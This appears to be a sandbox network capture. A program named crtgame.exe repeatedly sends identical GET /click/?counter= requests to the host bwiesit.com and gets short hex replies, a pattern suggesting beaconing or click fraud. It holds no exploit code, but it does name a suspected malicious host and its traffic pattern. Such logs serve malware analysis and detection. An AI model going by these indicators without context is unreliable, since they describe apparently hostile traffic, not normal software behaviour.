Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:07:58.845885038 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:00.204941988 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:00.439666986 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:01.785357952 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:02.067209959 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:03.392119884 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49747 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:03.627127886 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:05.000874043 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49753 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:05.240509033 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:06.576967001 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49759 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:06.823694944 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:08.166342974 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:08.273379087 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:08.771872044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:08.881850958 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:09.377691984 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49765 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:09.611638069 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:10.951509953 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49771 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:11.189832926 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:12.526029110 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:12.631575108 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:13.123840094 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49777 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:13.361428022 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:14.702039003 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49778 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:14.939625025 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:16.281989098 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49784 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:16.520201921 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:17.856797934 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49790 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:18.096235991 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:19.440357924 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49792 | 94.232.249.187 | 80 | 2496 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:08:19.674396992 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:21.022746086 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:08:21.131854057 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
Host: bwiesit.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:08:21.623733044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:08:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49798 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:21.861186981 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:23.211982012 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Timestamp: Dec 14, 2024 03:08:23.319390059 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:23.811348915 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49804 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:24.049947023 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:25.392980099 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:25.627547979 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:26.999140024 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49814 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:27.236995935 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:28.580423117 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49819 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:28.814522982 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:30.164670944 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Timestamp: Dec 14, 2024 03:08:30.272315025 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:30.770270109 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49825 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:31.003937006 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:32.348701000 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49828 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:32.580528021 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:33.923422098 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49834 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:34.161681890 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:35.504785061 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49839 | Destination IP: 94.232.249.187 | Destination Port: 80 | PID: 2496 | Process: C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp: Dec 14, 2024 03:08:35.739190102 CET | Bytes transferred: 295 | Direction: OUT
    GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
    Host: bwiesit.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Timestamp: Dec 14, 2024 03:08:37.096827984 CET | Bytes transferred: 220 | Direction: IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:08:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


